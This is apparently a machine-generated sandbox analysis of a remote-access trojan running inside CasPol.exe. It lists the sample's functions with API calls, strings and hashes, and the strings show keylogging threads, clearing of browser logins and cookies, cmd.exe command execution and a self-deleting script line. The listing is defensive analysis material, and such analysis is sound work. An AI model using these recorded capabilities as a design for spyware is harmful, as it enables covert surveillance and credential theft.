Function 004426E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442724
_free.LIBCMT ref: 004427EF
_free.LIBCMT ref: 004427F9

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, xrefs: 0044271B, 00442722, 00442751, 00442789

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
API String ID: 2506810119-3657627342
Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59

Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A

Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5

Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643

Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC

Strings

8>G, xrefs: 00403A5B
/sort "Visit Time" /stext ", xrefs: 00403A76

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$8>G
API String ID: 368326130-2663660666
Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99

Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Strings

Offline Keylogger Started, xrefs: 004098C7, 004098CE, 004098FB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
Instruction ID: 39d66220788a70d2f795ee3c864da876fba87127a7a6d83764b6ce8c19119ba3
Opcode Fuzzy Hash: 5ea4053e1a56471162166040b7adf2f927a814dce7017fd5fa1547eff60e0d80
Instruction Fuzzy Hash: 8011A7B25003097ED220BA36DC87CBF765CDA813A8B40053EF845222D3EA785E54C6FB

Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905

Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0

CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9

Strings

Online Keylogger Started, xrefs: 0040A626, 0040A62F, 0040A659

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
Instruction ID: 11da804b7f4806bc819379157d14523832a74cbdaa40f75774c11a3885c9476d
Opcode Fuzzy Hash: e9ef4b4ce2fe67d916c62a364ac3e8c7c3b8e9b8d94d7f8099fcb04cbe9a102f
Instruction Fuzzy Hash: 8A01C4916003093AE62076368C8BDBF3A6DCA813A8F40043EF541362C3E97D5D5582FB

Function 0044AA83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
__dosmaperr.LIBCMT ref: 0044AB0E

Strings

`@, xrefs: 0044AA88

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: `@
API String ID: 2583163307-951712118
Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction ID: 27d3a2ced18f85a81fd98b99658ced531467de2cab5132fdd739c317d4e1371d
Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
Instruction Fuzzy Hash: 56016F3664452016F7215274694977F774D8B42738F25036FF904972D2DD6D8CC5C19F

Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7

Strings

Connection Timeout, xrefs: 00404B66

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
Instruction ID: 87453c7fdf87cbb5f51522b6001dca4eac29197b42c1cd59420238f874304a49
Opcode Fuzzy Hash: 0c4e7447b4df129858c303fea986e9e9d1e62a01682a0eac217bcd46973c6bc4
Instruction Fuzzy Hash: 5F01F5B1900B41AFD325BB3A9C4655ABBE0AB45315700053FF6D396BB1DA38E840CB5A

Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08

Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C

Strings

bad locale name, xrefs: 0040CE16

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
Instruction ID: 10a02b8eb17e148bebaf39200f5874f6183f8458c9cdff10c330f193d408b506
Opcode Fuzzy Hash: ea2ce83f6b871e45ddc414103f177035841d2320bb142f548fd828e1a6c8a0e7
Instruction Fuzzy Hash: 3FF0A471400204EAC324FB23D853ACA73649F54748F90497FB446214D2FF3CB618CA8C

Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4

Strings

cmd.exe, xrefs: 004151E9
open, xrefs: 004151EE
/C , xrefs: 004151D2

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
Opcode Fuzzy Hash: fc1d9d8a200ebad5940102133050edab2b9e71f7596d6ef5b18c1bd3a17f0ddd
Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E

Function 0040AFBA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3

Strings

pth_unenc, xrefs: 0040AFBA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: TerminateThread$HookUnhookWindows
String ID: pth_unenc
API String ID: 3123878439-4028850238
Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759

Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
GetProcAddress.KERNEL32(00000000), ref: 004014E6

Strings

GetLastInputInfo, xrefs: 004014D5
User32.dll, xrefs: 004014DA

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
Instruction ID: d4d82ae3f827bcfb7cdfeca7c6c066ea5703a418acbc3ecfb38afa42acb71bdc
Opcode Fuzzy Hash: ef27dd233418dd298473fac05053b6d64ebabf300391abad082175f6434fde43
Instruction Fuzzy Hash: 6CB092B85843449BC7212BF1BC0DA293AA8FA48B43720447AF406C21A1EB7881809F6F

Function 00448D1B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448DA6
__alldvrm.LIBCMT ref: 00448FA7
__alldvrm.LIBCMT ref: 00448FC9

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759

Function 004559DA Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00455B09

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A

Function 00441A91 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
Instruction ID: 06af4f468b8ce8c690b0d071e5f1d97fd8a921e774867ed9179d92c0916ed768
Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
Instruction Fuzzy Hash: 3A412971A00744AFE724AF79CC41BAABBE8EB88714F10452FF511DB291E779A9818784

Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
Opcode Fuzzy Hash: 54d56c26835f845e219b8fbcfbfaee96f182a1e2e5f8d4c6d7efe874cd7b3d0f
Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A

Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040B81B
Sleep.KERNEL32(00001388), ref: 0040B8A3

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B8DE
Cleared browsers logins and cookies., xrefs: 0040B8EF

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
Instruction ID: 79c0b3a62e4074401f8092341c6d65849921352ddae30cadc40705057ad9e0e2
Opcode Fuzzy Hash: a560be4e93f7145764f14036b9ba5e851196c21c3d51501819e25b145e9be97c
Instruction Fuzzy Hash: FC31891564C3816ACA11777514167EB6F958A93754F0884BFF8C42B3E3DB7A480893EF

Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D

Sleep.KERNEL32(00000BB8), ref: 004115C3

Strings

@CG, xrefs: 00411547
exepath, xrefs: 0041154C, 0041158C, 0041160D
BG, xrefs: 00411539

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @CG$exepath$BG
API String ID: 4119054056-3221201242
Opcode ID: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
Instruction ID: 3bb97b322c4281cea59bb4e220ac43bd532ded5f68553a77fc2ada00b9ce30da
Opcode Fuzzy Hash: 7e871a5e45cf0c5aa995f5861383ecd3664757752265a40acd77ba434a7e4b44
Instruction Fuzzy Hash: EC21F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DF7D9D4581AD

Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739

Sleep.KERNEL32(000001F4), ref: 00409C95
Sleep.KERNEL32(00000064), ref: 00409D1F

Strings

[ , xrefs: 00409CB1
], xrefs: 00409C9D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
Instruction ID: 884b77faaa60fb736012887943be30d2742787962025037229812ea18f618e82
Opcode Fuzzy Hash: 98d6b66478057358495496a018cf8b974f91cae2485f626915356807bc928fff
Instruction Fuzzy Hash: 2E119F325042005BD218BB26DD17AAEB7A8AF50708F40047FF542221D3EF39AE1986DF

Function 0041B59F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
CloseHandle.KERNEL32(00000000), ref: 0041B61C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction ID: 3b94612a358327762e597db0d4245ee78264fa841ead315e3e24d1cb8b3ec7b7
Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE

Function 00442CE2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction ID: dab0b0a7df633c5b48e856b81aae527c8b914588f9bdc990e5f583acd93a84b2
Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction Fuzzy Hash: 5701F2F2A097163EF62116792CC0F6B670DDF413B9B31073BB921622E1EAE8CC42506C

Function 00442D61 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179

Function 00438105 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043811F

Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6

_UnwindNestedFrames.LIBCMT ref: 00438134
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
CallCatchBlock.LIBVCRUNTIME ref: 0043816D

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4

Function 00447220 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8

Function 0041B62A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
GetFileSize.KERNEL32(00000000,00000000), ref: 0041B657
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B67C
CloseHandle.KERNEL32(00000000), ref: 0041B68A

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
Opcode Fuzzy Hash: 84c524a448c010b9be172ba78faf3346c00c98969e38f24d930284b8d2add881
Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA

Function 0041851C Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 00418529
GetSystemMetrics.USER32(0000004D), ref: 0041852F
GetSystemMetrics.USER32(0000004E), ref: 00418535
GetSystemMetrics.USER32(0000004F), ref: 0041853B

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_CasPol.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9

Function 0041B38D Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB

Memory Dump Source

Source File: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

